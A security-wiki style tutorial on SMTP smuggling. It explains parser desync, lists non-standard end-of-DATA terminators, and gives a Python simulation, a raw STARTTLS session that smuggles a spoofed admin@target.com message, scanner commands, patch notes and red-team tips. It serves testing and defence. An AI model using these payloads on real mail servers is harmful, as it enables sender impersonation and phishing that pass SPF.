# SMTP Smuggling
## Basic Information
This type of vulnerability was originally discovered in this post (the SEC Consult write-up in the references below), where it is explained that it is possible to exploit discrepancies in how the SMTP protocol is interpreted when finalising an email. This lets an attacker smuggle additional emails inside the body of the legitimate one and thereby impersonate other users of the affected domain (such as admin@outlook.com), bypassing defenses such as SPF.
## Why
This happens because in the SMTP protocol the message data that will be sent in the email is controlled by the user (the attacker), who can send specially crafted data that abuses differences between parsers so that extra emails are smuggled into the receiver. See this example taken from the original post:
(Image from the original post; not reproduced here.)
## How
To exploit this vulnerability the attacker needs to send data that the Outbound SMTP server treats as a single email but the Inbound SMTP server treats as several emails.
The researchers found that different Inbound servers treat different characters as the end of the email message data, whereas Outbound servers do not.
For example, the standard end of data is `\r\n.\r\n`. But if the Inbound SMTP server also accepts `\n.`, an attacker can simply add that sequence to their email and start issuing the SMTP commands of a new message in order to smuggle it, as shown in the image above.
Of course, this only works if the Outbound SMTP server does not also treat that sequence as the end of the message data, because in that case it would see 2 emails instead of 1. This difference in interpretation is the desynchronization abused by this vulnerability.
Potential desynchronization data:
```
\n.
\n.\r
```
Also note that SPF is bypassed because, if you smuggle an email from admin@outlook.com out of the email of user@outlook.com, the sending domain is still outlook.com.
## Attacker checklist (what is required?)
To get the second email delivered successfully you usually need:
- An outbound server A you can send through (often with valid creds) that forwards the non-standard end-of-DATA sequence unchanged. Many services historically forwarded variants such as `\n.\r\n` or `\n.\n`.
- A receiving server B that interprets that non-standard sequence as end-of-DATA and then parses whatever follows as new SMTP commands (MAIL/RCPT/DATA...).
- The outbound side must actually use `DATA` (not `BDAT`). If A supports CHUNKING/BDAT, smuggling only works if it falls back to DATA (e.g. because B does not advertise CHUNKING); otherwise BDAT's length-based framing removes the ambiguity.
- PIPELINING is not required but helps keep the embedded commands inside a single TCP write so that middleboxes do not re-frame the sequence.
Common end-of-DATA variants worth testing (receiver dependent):
- `\n.\n`
- `\n.\r\n`
- `\r.\r\n`
- `\r\n.\r` (bare CR at end)
Note: what works is the intersection "what A forwards" ∩ "what B accepts".
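To make the desync concrete, here is an added example (not code from the original post or from any MTA) that models a strict receiver against a lenient one over a constructed DATA stream; the lenient terminator set, the sample stream and the `messages_seen`/`bare_newlines_in` helpers are assumptions of this example. It also counts bare newlines, which is the condition a hardened receiver rejects or normalizes.

```python
import re

# Standard end-of-DATA sentinel (RFC 5321) and, as an assumption for this
# example, the extra variants a lenient receiver might also honour.
STRICT_EOM = (b"\r\n.\r\n",)
LENIENT_EOM = (b"\r\n.\r\n", b"\n.\n", b"\n.\r\n", b"\r.\r\n", b"\r\n.\r")

# A CR or LF that is not part of a CRLF pair (a "bare" line ending).
BARE_NEWLINE = re.compile(rb"\r(?!\n)|(?<!\r)\n")

# Constructed sample: the bytes a sender pushes after its first DATA command.
SMUGGLED = (
    b"Subject: legit\r\n\r\nhello A"
    b"\n.\r\n"                            # non-standard terminator
    b"MAIL FROM:<admin@target.com>\r\n"   # reads as new commands to a lenient B
    b"RCPT TO:<victim@target.com>\r\n"
    b"DATA\r\n"
    b"Subject: smuggled\r\n\r\nhello B"
    b"\r\n.\r\n"                          # the only terminator a strict B accepts
)


def messages_seen(stream: bytes, terminators=STRICT_EOM) -> list:
    """Return the message bodies a receiver would accept from the bytes that
    follow its first DATA command: each body ends at the earliest terminator
    the receiver recognises, and the next body starts after the next DATA
    line (naive model: assumes 'DATA' does not occur inside a body)."""
    bodies, pos = [], 0
    while True:
        hits = [(stream.find(t, pos), t) for t in terminators]
        hits = [h for h in hits if h[0] != -1]
        if not hits:
            break  # no terminator yet: the receiver is still reading the body
        end, term = min(hits)
        bodies.append(stream[pos:end])
        nxt = stream.find(b"DATA", end + len(term))
        nl = stream.find(b"\n", nxt) if nxt != -1 else -1
        if nl == -1:
            break
        pos = nl + 1  # next body starts after the DATA line
    return bodies


def bare_newlines_in(stream: bytes) -> int:
    """Count bare CR/LF bytes in a DATA stream. A receiver with Postfix's
    `reject` policy refuses such a message; the `normalize` policy still
    requires the strict terminator and only rewrites these bytes to CRLF."""
    return len(BARE_NEWLINE.findall(stream))
```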
## Manual attack example (single session)
The following illustrates the idea using a raw STARTTLS SMTP session. After the first DATA block we inject a non-standard terminator, followed by another SMTP conversation that the receiving server may treat as a new message.
<details>
<summary>Manual smuggling session (STARTTLS)</summary>

```
$ openssl s_client -starttls smtp -crlf -connect smtp.example.com:587
EHLO a.example
AUTH PLAIN <base64 credentials>
# ... MAIL FROM / RCPT TO / DATA and headers of the legitimate message ...
hello A
\n.\r\n
MAIL FROM:<admin@target.com>
RCPT TO:<victim@target.com>
DATA
From: Admin <admin@target.com>
To: victim <victim@target.com>
Subject: smuggled

hello B
\r\n.\r\n
```

If A forwards `\n.\r\n` and B accepts it as end-of-DATA, the "hello B" message can be accepted as a second email from `admin@target.com` while passing SPF (it matches A's IPs).
</details>
Tip: when testing interactively, make sure `-crlf` is used so that OpenSSL turns the line endings you type into CRLF.
---
## Automation and scanners
- hannob/smtpsmug: sends messages terminated with a series of malformed end-of-DATA sequences to see which ones the receiver accepts.
  - Example: `./smtpsmug -s mail.target.com -p 25 -t victim@target.com`
- The-Login/SMTP-Smuggling-Tools: scanner for both the inbound and outbound sides plus an analysis SMTP server, to see precisely which sequences survive from the sender.
  - Inbound quick check: `python3 smtp_smuggling_scanner.py victim@target.com`
  - Outbound via a relay: `python3 smtp_smuggling_scanner.py YOUR@ANALYSIS.DOMAIN --outbound-smtp-server smtp.relay.com --port 587 --starttls --sender-address you@relay.com --username you@relay.com --password '...'`
These tools help you identify the A-B pairs for which smuggling works.
---
## CHUNKING/BDAT vs DATA
- DATA uses the sentinel terminator `<CR><LF>.<CR><LF>`; any ambiguity in how CR/LF are normalized or dot-stuffed leads to desync.
- CHUNKING (BDAT) frames the body by an exact byte length and therefore prevents classic smuggling. However, if the sender falls back to DATA (because the receiver does not advertise CHUNKING), classic smuggling becomes possible again.
---
## Notes on affected software and fixes (per target)
- Postfix: before 3.9 the default was to tolerate bare LFs; from 3.5.23/3.6.13/3.7.9/3.8.4 administrators can enable `smtpd_forbid_bare_newline`. The current recommendation is `smtpd_forbid_bare_newline = normalize` (3.8.5+/3.7.10+/3.6.14+/3.5.24+) or the `reject` setting for strict RFC enforcement.
- Exim: fixed in 4.97.1 (and later) for the variants that rely on mixed end-of-DATA sequences when DATA is used. Older 4.97/4.96 releases may be exploitable depending on PIPELINING/CHUNKING.
- Sendmail: fixed in 8.18; older 8.17.x releases accepted some non-standard terminators.
- Various libraries/servers (e.g. aiosmtpd before 1.4.5, some vendor gateways, and specific SaaS relays) had similar problems; modern releases generally accept only DATA terminated by a strict `<CR><LF>.<CR><LF>`.
Use the scanners mentioned above to verify current behaviour; many vendors changed their defaults during 2024-2025.
---
## Notes for red team ops
- Use large commodity senders as A (historically Exchange Online, shared hosters, etc.). If they still forward some non-standard EOM and are within the victim's SPF, the smuggled MAIL FROM inherits their reputation.
- Enumerate B's SMTP extensions: check the `EHLO` banner for PIPELINING/CHUNKING; if CHUNKING is absent you have a better chance against BDAT-first senders. Combine with malformed EOMs to test acceptance.
- Check the headers: a smuggled message will usually form a different Received chain starting at B. DMARC will often pass because MAIL FROM matches A's IP range.
---
## References
- [https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/)
- [https://www.postfix.org/smtp-smuggling.html](https://www.postfix.org/smtp-smuggling.html)